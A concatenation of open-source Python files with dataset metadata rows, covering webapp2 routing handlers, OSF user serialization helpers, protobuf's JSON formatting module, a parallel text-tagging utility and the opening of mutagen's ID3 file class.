'Use rights url',
'Time required',
'Interactivity type',
'About'
]
self.response.out.write(template.render(lrmi_properties=lrmi_properties))
class AboutHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('about.html')
self.response.out.write(template.render())
class HowtoHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('howto.html')
self.response.out.write(template.render())
class SubdomainHomeHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('howto.html')
self.response.out.write(template.render())
class DatasetsMainHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-engine.html')
self.response.out.write(template.render())
class DatasetsAboutHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-about.html')
self.response.out.write(template.render())
class DatasetsHowToHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-howto.html')
self.response.out.write(template.render())
class HomepageHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('homepage.html')
self.response.out.write(template.render())
app = webapp2.WSGIApplication([
routes.DomainRoute('edu.schema-labs.appspot.com', [
webapp2.Route('/', handler=MainHandler, name='lrmi-cse-home'),
webapp2.Route('/about', handler=AboutHandler, name='lrmi-cse-about'),
webapp2.Route('/howto', handler=HowtoHandler, name='lrmi-cse-howto'),
]),
routes.DomainRoute('datasets.schema-labs.appspot.com', [
webapp2.Route('/', handler=DatasetsMainHandler, name='datasets-cse-home'),
webapp2.Route('/about', handler=DatasetsAboutHandler, name='datasets-cse-about'),
webapp2.Route('/howto', handler=DatasetsHowToHandler, name='datasets-cse-howto'),
]),
routes.DomainRoute('schema-labs.appspot.com', [
webapp2.Route('/', handler=HomepageHandler, name='datasets-cse-home'),
]),
routes.DomainRoute('localhost', [
webapp2.Route('/', handler=MainHandler, name='datasets-cse-home'),
#webapp2.Route('/', handler=HomepageHandler, name='datasets-cse-home'),
webapp2.Route('/about', handler=AboutHandler, name='lrmi-cse-about'),
webapp2.Route('/howto', handler=HowtoHandler, name='lrmi-cse-howto'),
])
], debug=True)
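# Note on the routing above: requests are dispatched on the Host header: the
# edu. and datasets. subdomains get their own handler sets, the bare appspot
# domain serves the homepage, and localhost mirrors the LRMI engine for local
# development.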
| apache-2.0 | 7,341,933,721,958,709,000 | 29.983333 | 89 | 0.714094 | false |
caseyrollins/osf.io | website/profile/utils.py | 3 | 7386 | # -*- coding: utf-8 -*-
from framework import auth
from website import settings
from osf.models import Contributor
from addons.osfstorage.models import Region
from website.filters import profile_image_url
from osf.models.contributor import get_contributor_permissions
from osf.utils.permissions import reduce_permissions
from osf.utils import workflows
from website.ember_osf_web.decorators import storage_i18n_flag_active
def get_profile_image_url(user, size=settings.PROFILE_IMAGE_MEDIUM):
return profile_image_url(settings.PROFILE_IMAGE_PROVIDER,
user,
use_ssl=True,
size=size)
def serialize_user(user, node=None, admin=False, full=False, is_profile=False, include_node_counts=False):
"""
Return a dictionary representation of a registered user.
:param User user: A User object
:param bool full: Include complete user properties
"""
contrib = None
if isinstance(user, Contributor):
contrib = user
user = contrib.user
fullname = user.display_full_name(node=node)
ret = {
'id': str(user._id),
'registered': user.is_registered,
'surname': user.family_name,
'fullname': fullname,
'shortname': fullname if len(fullname) < 50 else fullname[:23] + '...' + fullname[-23:],
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_MEDIUM),
'active': user.is_active,
}
if node is not None:
if admin:
flags = {
'visible': False,
'permission': 'read',
}
else:
is_contributor_obj = isinstance(contrib, Contributor)
flags = {
'visible': contrib.visible if is_contributor_obj else node.contributor_set.filter(user=user, visible=True).exists(),
'permission': get_contributor_permissions(contrib, as_list=False) if is_contributor_obj else reduce_permissions(node.get_permissions(user)),
}
ret.update(flags)
if user.is_registered:
ret.update({
'url': user.url,
'absolute_url': user.absolute_url,
'display_absolute_url': user.display_absolute_url,
'date_registered': user.date_registered.strftime('%Y-%m-%d'),
})
if full:
# Add emails
if is_profile:
ret['emails'] = [
{
'address': each,
'primary': each.strip().lower() == user.username.strip().lower(),
'confirmed': True,
} for each in user.emails.values_list('address', flat=True)
] + [
{
'address': each,
'primary': each.strip().lower() == user.username.strip().lower(),
'confirmed': False
}
for each in user.get_unconfirmed_emails_exclude_external_identity()
]
if user.is_merged:
merger = user.merged_by
merged_by = {
'id': str(merger._primary_key),
'url': merger.url,
'absolute_url': merger.absolute_url
}
else:
merged_by = None
default_region = user.get_addon('osfstorage').default_region
available_regions = [region for region in Region.objects.all().values('_id', 'name')]
ret.update({
'activity_points': user.get_activity_points(),
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_LARGE),
'is_merged': user.is_merged,
'available_regions': available_regions,
'storage_flag_is_active': storage_i18n_flag_active(),
'default_region': {'name': default_region.name, '_id': default_region._id},
'merged_by': merged_by,
})
if include_node_counts:
projects = user.nodes.exclude(is_deleted=True).filter(type='osf.node').get_roots()
ret.update({
'number_projects': projects.count(),
'number_public_projects': projects.filter(is_public=True).count(),
})
return ret
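# Note on serialize_user above: the base dict always carries id, registered,
# surname, fullname, shortname, profile_image_url and active; passing a node
# adds the visible/permission flags, full=True adds merge/region/activity
# details (and emails when is_profile is True), and, when full, the
# include_node_counts flag adds project counts.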
def serialize_contributors(contribs, node, **kwargs):
return [
serialize_user(contrib, node, **kwargs)
for contrib in contribs
]
def serialize_visible_contributors(node):
# This is optimized when node has .include('contributor__user__guids')
return [
serialize_user(c, node) for c in node.contributor_set.all() if c.visible
]
def add_contributor_json(user, current_user=None, node=None):
"""
Generate a dictionary representation of a user, optionally including # projects shared with `current_user`
:param User user: The user object to serialize
:param User current_user : The user object for a different user, to calculate number of projects in common
:return dict: A dict representing the serialized user data
"""
# get shared projects
if current_user:
n_projects_in_common = current_user.n_projects_in_common(user)
else:
n_projects_in_common = 0
current_employment = None
education = None
if user.jobs:
current_employment = user.jobs[0]['institution']
if user.schools:
education = user.schools[0]['institution']
contributor_json = {
'fullname': user.fullname,
'email': user.email,
'id': user._primary_key,
'employment': current_employment,
'education': education,
'n_projects_in_common': n_projects_in_common,
'registered': user.is_registered,
'active': user.is_active,
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_MEDIUM),
'profile_url': user.profile_url
}
if node:
contributor_info = user.contributor_set.get(node=node.parent_node)
contributor_json['permission'] = get_contributor_permissions(contributor_info, as_list=False)
contributor_json['visible'] = contributor_info.visible
return contributor_json
def serialize_unregistered(fullname, email):
"""Serializes an unregistered user."""
user = auth.get_user(email=email)
if user is None:
serialized = {
'fullname': fullname,
'id': None,
'registered': False,
'active': False,
'profile_image_url': profile_image_url(settings.PROFILE_IMAGE_PROVIDER,
email,
use_ssl=True,
size=settings.PROFILE_IMAGE_MEDIUM),
'email': email,
}
else:
serialized = add_contributor_json(user)
serialized['fullname'] = fullname
serialized['email'] = email
return serialized
def serialize_access_requests(node):
"""Serialize access requests for a node"""
return [
{
'user': serialize_user(access_request.creator),
'comment': access_request.comment,
'id': access_request._id
} for access_request in node.requests.filter(
request_type=workflows.RequestTypes.ACCESS.value,
machine_state=workflows.DefaultStates.PENDING.value
).select_related('creator')
]
| apache-2.0 | 3,375,359,164,777,297,000 | 35.384236 | 156 | 0.585026 | false |
Eric-Gaudiello/tensorflow_dev | tensorflow_home/tensorflow_venv/lib/python3.4/site-packages/google/protobuf/json_format.py | 3 | 21174 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in JSON format."""
__author__ = '[email protected] (Jie Luo)'
import base64
from datetime import datetime
import json
import math
import re
import sys
from google.protobuf import descriptor
_TIMESTAMPFOMAT = '%Y-%m-%dT%H:%M:%S'
_NUMBER = re.compile(u'[0-9+-][0-9e.+-]*')
_INTEGER = re.compile(u'[0-9+-]')
_INT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT32,
descriptor.FieldDescriptor.CPPTYPE_UINT32,
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64])
_INT64_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64])
_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE])
if str is bytes:
_UNICODETYPE = unicode
else:
_UNICODETYPE = str
class SerializeToJsonError(Exception):
"""Thrown if serialization to JSON fails."""
class ParseError(Exception):
"""Thrown in case of parsing error."""
def MessageToJson(message, including_default_value_fields=False):
"""Converts protobuf message to JSON format.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
Returns:
A string containing the JSON formatted protocol buffer message.
"""
js = _MessageToJsonObject(message, including_default_value_fields)
return json.dumps(js, indent=2)
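# Illustrative usage sketch; `my_pb2.MyMessage` is a placeholder for any
# generated protobuf message class and `name` is assumed to be one of its
# string fields:
#
#   message = my_pb2.MyMessage()
#   message.name = 'foo'
#   json_text = MessageToJson(message)
#   restored = Parse(json_text, my_pb2.MyMessage())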
def _MessageToJsonObject(message, including_default_value_fields):
"""Converts message to an object according to Proto3 JSON Specification."""
message_descriptor = message.DESCRIPTOR
if _IsTimestampMessage(message_descriptor):
return _TimestampMessageToJsonObject(message)
if _IsDurationMessage(message_descriptor):
return _DurationMessageToJsonObject(message)
if _IsFieldMaskMessage(message_descriptor):
return _FieldMaskMessageToJsonObject(message)
if _IsWrapperMessage(message_descriptor):
return _WrapperMessageToJsonObject(message)
return _RegularMessageToJsonObject(message, including_default_value_fields)
def _IsMapEntry(field):
return (field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type.has_options and
field.message_type.GetOptions().map_entry)
def _RegularMessageToJsonObject(message, including_default_value_fields):
"""Converts normal message according to Proto3 JSON Specification."""
js = {}
fields = message.ListFields()
try:
for field, value in fields:
name = field.camelcase_name
if _IsMapEntry(field):
# Convert a map field.
js_map = {}
for key in value:
if isinstance(key, bool):
if key:
recorded_key = 'true'
else:
recorded_key = 'false'
else:
recorded_key = key
js_map[recorded_key] = _ConvertFieldToJsonObject(
field.message_type.fields_by_name['value'],
value[key], including_default_value_fields)
js[name] = js_map
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
# Convert a repeated field.
repeated = []
for element in value:
repeated.append(_ConvertFieldToJsonObject(
field, element, including_default_value_fields))
js[name] = repeated
else:
js[name] = _ConvertFieldToJsonObject(
field, value, including_default_value_fields)
# Serialize default value if including_default_value_fields is True.
if including_default_value_fields:
message_descriptor = message.DESCRIPTOR
for field in message_descriptor.fields:
# Singular message fields and oneof fields will not be affected.
if ((field.label != descriptor.FieldDescriptor.LABEL_REPEATED and
field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE) or
field.containing_oneof):
continue
name = field.camelcase_name
if name in js:
        # Skip the field which has been serialized already.
continue
if _IsMapEntry(field):
js[name] = {}
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
js[name] = []
else:
js[name] = _ConvertFieldToJsonObject(field, field.default_value)
except ValueError as e:
raise SerializeToJsonError(
'Failed to serialize {0} field: {1}'.format(field.name, e))
return js
def _ConvertFieldToJsonObject(
field, value, including_default_value_fields=False):
"""Converts field value according to Proto3 JSON Specification."""
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
return _MessageToJsonObject(value, including_default_value_fields)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
enum_value = field.enum_type.values_by_number.get(value, None)
if enum_value is not None:
return enum_value.name
else:
raise SerializeToJsonError('Enum field contains an integer value '
                                 'which cannot be mapped to an enum value.')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# Use base64 Data encoding for bytes
return base64.b64encode(value).decode('utf-8')
else:
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
return True
else:
return False
elif field.cpp_type in _INT64_TYPES:
return str(value)
elif field.cpp_type in _FLOAT_TYPES:
if math.isinf(value):
if value < 0.0:
return '-Infinity'
else:
return 'Infinity'
if math.isnan(value):
return 'NaN'
return value
def _IsTimestampMessage(message_descriptor):
return (message_descriptor.name == 'Timestamp' and
message_descriptor.file.name == 'google/protobuf/timestamp.proto')
def _TimestampMessageToJsonObject(message):
"""Converts Timestamp message according to Proto3 JSON Specification."""
nanos = message.nanos % 1e9
dt = datetime.utcfromtimestamp(
message.seconds + (message.nanos - nanos) / 1e9)
result = dt.isoformat()
if (nanos % 1e9) == 0:
# If there are 0 fractional digits, the fractional
# point '.' should be omitted when serializing.
return result + 'Z'
if (nanos % 1e6) == 0:
# Serialize 3 fractional digits.
return result + '.%03dZ' % (nanos / 1e6)
if (nanos % 1e3) == 0:
# Serialize 6 fractional digits.
return result + '.%06dZ' % (nanos / 1e3)
# Serialize 9 fractional digits.
return result + '.%09dZ' % nanos
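# For example, a Timestamp with seconds=1 and nanos=500000000 is rendered by
# the rules above as '1970-01-01T00:00:01.500Z' (fractional digits are emitted
# in groups of 3, 6 or 9).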
def _IsDurationMessage(message_descriptor):
return (message_descriptor.name == 'Duration' and
message_descriptor.file.name == 'google/protobuf/duration.proto')
def _DurationMessageToJsonObject(message):
"""Converts Duration message according to Proto3 JSON Specification."""
if message.seconds < 0 or message.nanos < 0:
result = '-'
seconds = - message.seconds + int((0 - message.nanos) / 1e9)
nanos = (0 - message.nanos) % 1e9
else:
result = ''
seconds = message.seconds + int(message.nanos / 1e9)
nanos = message.nanos % 1e9
result += '%d' % seconds
if (nanos % 1e9) == 0:
# If there are 0 fractional digits, the fractional
# point '.' should be omitted when serializing.
return result + 's'
if (nanos % 1e6) == 0:
# Serialize 3 fractional digits.
return result + '.%03ds' % (nanos / 1e6)
if (nanos % 1e3) == 0:
# Serialize 6 fractional digits.
return result + '.%06ds' % (nanos / 1e3)
# Serialize 9 fractional digits.
return result + '.%09ds' % nanos
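# For example, a Duration with seconds=3 and nanos=0 is rendered as '3s',
# while seconds=3 and nanos=500000000 gives '3.500s'.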
def _IsFieldMaskMessage(message_descriptor):
return (message_descriptor.name == 'FieldMask' and
message_descriptor.file.name == 'google/protobuf/field_mask.proto')
def _FieldMaskMessageToJsonObject(message):
"""Converts FieldMask message according to Proto3 JSON Specification."""
result = ''
first = True
for path in message.paths:
if not first:
result += ','
result += path
first = False
return result
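# The paths are simply joined with commas, e.g. paths ['user.name', 'photo']
# become the JSON string 'user.name,photo'.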
def _IsWrapperMessage(message_descriptor):
return message_descriptor.file.name == 'google/protobuf/wrappers.proto'
def _WrapperMessageToJsonObject(message):
return _ConvertFieldToJsonObject(
message.DESCRIPTOR.fields_by_name['value'], message.value)
def _DuplicateChecker(js):
result = {}
for name, value in js:
if name in result:
raise ParseError('Failed to load JSON: duplicate key ' + name)
result[name] = value
return result
def Parse(text, message):
"""Parses a JSON representation of a protocol message into a message.
Args:
text: Message JSON representation.
    message: A protocol buffer message to merge into.
Returns:
The same message passed as argument.
  Raises:
ParseError: On JSON parsing problems.
"""
if not isinstance(text, _UNICODETYPE): text = text.decode('utf-8')
try:
if sys.version_info < (2, 7):
# object_pair_hook is not supported before python2.7
js = json.loads(text)
else:
js = json.loads(text, object_pairs_hook=_DuplicateChecker)
except ValueError as e:
raise ParseError('Failed to load JSON: ' + str(e))
_ConvertFieldValuePair(js, message)
return message
def _ConvertFieldValuePair(js, message):
"""Convert field value pairs into regular message.
Args:
js: A JSON object to convert the field value pairs.
message: A regular protocol message to record the data.
Raises:
ParseError: In case of problems converting.
"""
names = []
message_descriptor = message.DESCRIPTOR
for name in js:
try:
field = message_descriptor.fields_by_camelcase_name.get(name, None)
if not field:
raise ParseError(
'Message type "{0}" has no field named "{1}".'.format(
message_descriptor.full_name, name))
if name in names:
raise ParseError(
'Message type "{0}" should not have multiple "{1}" fields.'.format(
message.DESCRIPTOR.full_name, name))
names.append(name)
# Check no other oneof field is parsed.
if field.containing_oneof is not None:
oneof_name = field.containing_oneof.name
if oneof_name in names:
raise ParseError('Message type "{0}" should not have multiple "{1}" '
'oneof fields.'.format(
message.DESCRIPTOR.full_name, oneof_name))
names.append(oneof_name)
value = js[name]
if value is None:
message.ClearField(field.name)
continue
# Parse field value.
if _IsMapEntry(field):
message.ClearField(field.name)
_ConvertMapFieldValue(value, message, field)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
message.ClearField(field.name)
if not isinstance(value, list):
raise ParseError('repeated field {0} must be in [] which is '
'{1}'.format(name, value))
for item in value:
if item is None:
continue
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
sub_message = getattr(message, field.name).add()
_ConvertMessage(item, sub_message)
else:
getattr(message, field.name).append(
_ConvertScalarFieldValue(item, field))
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
sub_message = getattr(message, field.name)
_ConvertMessage(value, sub_message)
else:
setattr(message, field.name, _ConvertScalarFieldValue(value, field))
except ParseError as e:
if field and field.containing_oneof is None:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
else:
raise ParseError(str(e))
except ValueError as e:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
except TypeError as e:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
def _ConvertMessage(value, message):
"""Convert a JSON object into a message.
Args:
value: A JSON object.
message: A WKT or regular protocol message to record the data.
Raises:
ParseError: In case of convert problems.
"""
message_descriptor = message.DESCRIPTOR
if _IsTimestampMessage(message_descriptor):
_ConvertTimestampMessage(value, message)
elif _IsDurationMessage(message_descriptor):
_ConvertDurationMessage(value, message)
elif _IsFieldMaskMessage(message_descriptor):
_ConvertFieldMaskMessage(value, message)
elif _IsWrapperMessage(message_descriptor):
_ConvertWrapperMessage(value, message)
else:
_ConvertFieldValuePair(value, message)
def _ConvertTimestampMessage(value, message):
"""Convert a JSON representation into Timestamp message."""
timezone_offset = value.find('Z')
if timezone_offset == -1:
timezone_offset = value.find('+')
if timezone_offset == -1:
timezone_offset = value.rfind('-')
if timezone_offset == -1:
raise ParseError(
'Failed to parse timestamp: missing valid timezone offset.')
time_value = value[0:timezone_offset]
# Parse datetime and nanos
point_position = time_value.find('.')
if point_position == -1:
second_value = time_value
nano_value = ''
else:
second_value = time_value[:point_position]
nano_value = time_value[point_position + 1:]
date_object = datetime.strptime(second_value, _TIMESTAMPFOMAT)
td = date_object - datetime(1970, 1, 1)
seconds = td.seconds + td.days * 24 * 3600
if len(nano_value) > 9:
raise ParseError(
'Failed to parse Timestamp: nanos {0} more than '
'9 fractional digits.'.format(nano_value))
if nano_value:
nanos = round(float('0.' + nano_value) * 1e9)
else:
nanos = 0
# Parse timezone offsets
if value[timezone_offset] == 'Z':
if len(value) != timezone_offset + 1:
raise ParseError(
'Failed to parse timestamp: invalid trailing data {0}.'.format(value))
else:
timezone = value[timezone_offset:]
pos = timezone.find(':')
if pos == -1:
raise ParseError(
'Invalid timezone offset value: ' + timezone)
if timezone[0] == '+':
seconds += (int(timezone[1:pos])*60+int(timezone[pos+1:]))*60
else:
seconds -= (int(timezone[1:pos])*60+int(timezone[pos+1:]))*60
# Set seconds and nanos
message.seconds = int(seconds)
message.nanos = int(nanos)
def _ConvertDurationMessage(value, message):
"""Convert a JSON representation into Duration message."""
if value[-1] != 's':
raise ParseError(
'Duration must end with letter "s": ' + value)
try:
duration = float(value[:-1])
except ValueError:
raise ParseError(
'Couldn\'t parse duration: ' + value)
message.seconds = int(duration)
message.nanos = int(round((duration - message.seconds) * 1e9))
def _ConvertFieldMaskMessage(value, message):
"""Convert a JSON representation into FieldMask message."""
for path in value.split(','):
message.paths.append(path)
def _ConvertWrapperMessage(value, message):
"""Convert a JSON representation into Wrapper message."""
field = message.DESCRIPTOR.fields_by_name['value']
setattr(message, 'value', _ConvertScalarFieldValue(value, field))
def _ConvertMapFieldValue(value, message, field):
"""Convert map field value for a message map field.
Args:
value: A JSON object to convert the map field value.
message: A protocol message to record the converted data.
field: The descriptor of the map field to be converted.
Raises:
ParseError: In case of convert problems.
"""
if not isinstance(value, dict):
raise ParseError(
        'Map field {0} must be in {{}} which is {1}.'.format(field.name, value))
key_field = field.message_type.fields_by_name['key']
value_field = field.message_type.fields_by_name['value']
for key in value:
key_value = _ConvertScalarFieldValue(key, key_field, True)
if value_field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
_ConvertMessage(value[key], getattr(message, field.name)[key_value])
else:
getattr(message, field.name)[key_value] = _ConvertScalarFieldValue(
value[key], value_field)
def _ConvertScalarFieldValue(value, field, require_quote=False):
"""Convert a single scalar field value.
Args:
value: A scalar value to convert the scalar field value.
field: The descriptor of the field to convert.
require_quote: If True, '"' is required for the field value.
Returns:
The converted scalar field value
Raises:
ParseError: In case of convert problems.
"""
if field.cpp_type in _INT_TYPES:
return _ConvertInteger(value)
elif field.cpp_type in _FLOAT_TYPES:
return _ConvertFloat(value)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
return _ConvertBool(value, require_quote)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
return base64.b64decode(value)
else:
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
# Convert an enum value.
enum_value = field.enum_type.values_by_name.get(value, None)
if enum_value is None:
raise ParseError(
'Enum value must be a string literal with double quotes. '
'Type "{0}" has no value named {1}.'.format(
field.enum_type.full_name, value))
return enum_value.number
def _ConvertInteger(value):
"""Convert an integer.
Args:
value: A scalar value to convert.
Returns:
The integer value.
Raises:
ParseError: If an integer couldn't be consumed.
"""
if isinstance(value, float):
raise ParseError('Couldn\'t parse integer: {0}'.format(value))
if isinstance(value, _UNICODETYPE) and not _INTEGER.match(value):
raise ParseError('Couldn\'t parse integer: "{0}"'.format(value))
return int(value)
def _ConvertFloat(value):
"""Convert an floating point number."""
if value == 'nan':
raise ParseError('Couldn\'t parse float "nan", use "NaN" instead')
try:
# Assume Python compatible syntax.
return float(value)
except ValueError:
# Check alternative spellings.
if value == '-Infinity':
return float('-inf')
elif value == 'Infinity':
return float('inf')
elif value == 'NaN':
return float('nan')
else:
raise ParseError('Couldn\'t parse float: {0}'.format(value))
def _ConvertBool(value, require_quote):
"""Convert a boolean value.
Args:
value: A scalar value to convert.
require_quote: If True, '"' is required for the boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if require_quote:
if value == 'true':
return True
elif value == 'false':
return False
else:
raise ParseError('Expect "true" or "false", not {0}.'.format(value))
if not isinstance(value, bool):
raise ParseError('Expected true or false without quotes.')
return value
| gpl-3.0 | -3,895,382,516,134,386,000 | 33.485342 | 80 | 0.676396 | false |
xflows/tf_core | tf_core/nltoolkit/lib/tagging_common_parallel.py | 1 | 5237 | import multiprocessing
from functools import partial
def tag_document(document,tagger,tagger_function,args,kwargs,input_annotation,output_annotation):
if document.features['contentType'] == "Text":
if not document.text:
pass
for annotation,subtext in document.get_annotations_with_text(input_annotation): #all annotations of this type
if subtext:
new_feature=getattr(tagger,tagger_function)(subtext,*args,**kwargs)
if new_feature!=None:
annotation.features[output_annotation]=new_feature
return document
def universal_word_tagger_hub(adc,tagger_dict,input_annotation,output_annotation):
tagger=tagger_dict['object']
tagger_function=tagger_dict['function']
args=tagger_dict.get('args',[])
kwargs=tagger_dict.get('kargs',{})
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
print("evo nas!!!")
#parallel for document in adc.documents:
new_documents=pool.map(
partial(tag_document,
tagger=tagger,
tagger_function=tagger_function,
args=args,
kwargs=kwargs,
input_annotation=input_annotation,
output_annotation=output_annotation),
adc.documents,
100 #chunksize, constructs list of this size which are passed to pool workers
)
pool.close()
pool.join()
adc.documents=new_documents #list(new_documents)
print("dijo!2!!")
return {'adc': adc }
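# Note: `tagger_dict` is assumed to look roughly like
#   {'object': tagger_instance, 'function': 'method_name', 'args': [], 'kargs': {}}
# The named method is called on the text of every `input_annotation` span and
# its return value is stored as the `output_annotation` feature.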
def sentance_tag_a_document(doc,tagger,tagger_function,args,kwargs,
element_annotation_name,group_annotation_name,output_annotation_name):
if doc.features['contentType'] == "Text":
if not doc.text:
pass
group_annotations=sorted(doc.get_annotations_with_text(group_annotation_name),key=lambda x: x[0].span_start)
element_annotations=sorted(doc.get_annotations_with_text(element_annotation_name),key=lambda x: x[0].span_start)
        text_grouped=[] #text_grouped= [['First','sentence'],['Second','sentence']]
        annotations_grouped=[] #annotations_grouped= [[<Annotation span_start:0 span_end:4>, <Annotation span_start:6 span_end:11>],[...
i=0
for group_annotation,_ in group_annotations:
elements=[]
sentence_annotations=[]
#find elementary annotations 'contained' in the group_annotation
while i<len(element_annotations) and element_annotations[i][0].span_end<=group_annotation.span_end:
annotation=element_annotations[i][0]
text_block=element_annotations[i][1]
elements.append(text_block)
sentence_annotations.append(annotation)
i+=1
text_grouped.append(elements)
annotations_grouped.append(sentence_annotations)
new_features=getattr(tagger,tagger_function)(text_grouped,*args,**kwargs)
for sentence_features, sentence_annotations in zip(new_features,annotations_grouped):
for feature,annotation in zip(sentence_features,sentence_annotations):
annotation.features[output_annotation_name]=feature[1]
return doc
def universal_sentence_tagger_hub(input_dict):
tagger_dict = input_dict['pos_tagger']
tagger=tagger_dict['object']
tagger_function=tagger_dict['function']
args=tagger_dict.get('args',[])
kwargs=tagger_dict.get('kargs',{})
group_annotation_name = input_dict['group_annotation']
element_annotation_name = input_dict['element_annotation']
output_annotation_name = input_dict['output_feature']
adc = input_dict['adc']
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
print("evo nas!!!")
#parallel for document in adc.documents:
new_documents=pool.map(
partial(sentance_tag_a_document,
tagger=tagger,
tagger_function=tagger_function,
args=args,
kwargs=kwargs,
element_annotation_name=element_annotation_name,
group_annotation_name=group_annotation_name,
output_annotation_name=output_annotation_name),
adc.documents,
100 #chunksize, constructs list of this size which are passed to pool workers
)
pool.close()
pool.join()
adc.documents=new_documents
print("dijo!!!")
return {'adc': adc }
# def chunks(l, n):
# c=[[] for _ in range(n)]
# for i in range(l):
# c[i%n].append(i)
# return c
#
# print chunks(10,6)
#
# from multiprocessing import Process, Value, Array, Pool
#
# def f(a,indices):
# for i in indices:
# a[i] = -a[i]
#
# if __name__ == '__main__':
# a=[[i] for i in range(100)]
# arr = Array('i', a)
#
# no_of_workers=6
# workers=[Process(target=f, args=(arr, indices)) for indices in chunks(len(arr),no_of_workers)]
#
#
# for p in workers:
# p.start()
# for p in workers:
# p.join()
#
# print arr[:]
# print a
#
#
# #pool = multiprocessing.Pool(processes=6)
# #case_data = RAW_DATASET
# #pool.apply(f, args=(num, arr))
# #pool.close()
# #pool.join()
| mit | 1,324,712,501,938,792,000 | 33.453947 | 136 | 0.625167 | false |
digris/openbroadcast.org | website/tools/mutagen/id3/_file.py | 2 | 12328 | # -*- coding: utf-8 -*-
# Copyright (C) 2005 Michael Urman
# 2006 Lukas Lalinsky
# 2013 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import struct
import mutagen
from mutagen._util import (
insert_bytes,
delete_bytes,
enum,
loadfile,
convert_error,
read_full,
)
from mutagen._tags import PaddingInfo
from ._util import error, ID3NoHeaderError, ID3UnsupportedVersionError, BitPaddedInt
from ._tags import ID3Tags, ID3Header, ID3SaveConfig
from ._id3v1 import MakeID3v1, find_id3v1
@enum
class ID3v1SaveOptions(object):
REMOVE = 0
"""ID3v1 tags will be removed"""
UPDATE = 1
"""ID3v1 tags will be updated but not added"""
CREATE = 2
"""ID3v1 tags will be created and/or updated"""
class ID3(ID3Tags, mutagen.Metadata):
"""ID3(filething=None)
A file with an ID3v2 tag.
If any arguments are given, the :meth:`load` is called with them. If no
arguments are given then an empty `ID3` object is created.
::
ID3("foo.mp3")
# same as
t = ID3()
t.load("foo.mp3")
Arguments:
filething (filething): or `None`
Attributes:
version (tuple[int]): ID3 tag version as a tuple
